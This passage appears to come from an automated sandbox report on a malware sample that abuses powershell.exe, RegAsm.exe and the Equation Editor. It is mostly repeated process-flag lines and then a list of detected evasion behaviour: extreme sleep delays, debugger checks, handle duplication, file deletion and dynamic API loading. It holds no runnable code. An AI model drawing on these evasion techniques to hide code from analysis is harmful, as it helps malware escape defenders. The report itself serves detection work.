                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040F7E2 Sleep,ExitProcess,14_2_0040F7E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,14_2_0041A7D9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2396Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5456Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9224Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1631Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_14-53717
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3816Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4024Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3944Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep count: 180 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep count: 5456 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep time: -3000000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3024Thread sleep count: 251 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3024Thread sleep time: -125500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3020Thread sleep count: 233 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3020Thread sleep time: -699000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2180Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3020Thread sleep count: 9224 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3020Thread sleep time: -27672000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2464Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407877 FindFirstFileW,FindNextFileW,14_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044E8F9 FindFirstFileExA,14_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10006580 FindFirstFileExA,14_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CBE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00443355 mov eax, dword ptr fs:[00000030h]14_2_00443355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10004AB4 mov eax, dword ptr fs:[00000030h]14_2_10004AB4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,14_2_00411D39
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434BD8 SetUnhandledExceptionFilter,14_2_00434BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0043BB71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_100060E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_10002639
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_10002B1C

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
